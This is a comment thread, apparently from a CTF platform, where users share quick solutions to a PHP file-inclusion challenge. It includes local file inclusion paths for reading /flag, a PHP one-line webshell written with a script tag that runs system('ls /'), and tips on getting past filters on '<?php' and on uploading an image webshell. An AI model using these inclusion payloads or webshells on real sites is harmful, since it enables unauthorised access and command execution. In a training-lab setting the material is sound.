为啥不能用伪协议????
http://114.67.175.224:14357/index.php?file=/flag
index.php?file=file:///flag 直接一把梭
http://114.67.175.224:15047/index.php?file=/flag,写一句话木马,<script language=php>system("ls /")</script> 查看根目录下的文件,发现flag文件,令file=/flag,即可获得flag
注意一是屏蔽了<?,需要用<script language=php>写马,二是蚁剑不要直接连接图片,,记得加?file=
直接把hello.php改成 /flag 就秒出了
文件上传+图片一句马 题解:https://www.yeyusmile.top/archives/fileinclude2
包含/flag就行
无脑/flag直接获得flag哈哈哈
别卷了阿财
看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以
...
评论
于无声处听惊雷 1年前
举报
为啥不能用伪协议????
wuzhengke 1年前
举报
http://114.67.175.224:14357/index.php?file=/flag
spiritboy 1年前
举报
index.php?file=file:///flag 直接一把梭
15338641414 1年前
举报
http://114.67.175.224:15047/index.php?file=/flag,写一句话木马,<script language=php>system("ls /")</script> 查看根目录下的文件,发现flag文件,令file=/flag,即可获得flag
落叶满阶红 2年前
举报
注意一是屏蔽了<?,需要用<script language=php>写马,二是蚁剑不要直接连接图片,,记得加?file=
HuangYanQwQ 1年前
举报
直接把hello.php改成 /flag 就秒出了
夜雨 2年前
举报
文件上传+图片一句马 题解:https://www.yeyusmile.top/archives/fileinclude2
你能刑 2年前
举报
包含/flag就行
树木有点绿 2年前
举报
无脑/flag直接获得flag哈哈哈
青蛙骑士 2年前
举报
别卷了阿财
liln0te 2年前
举报
看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以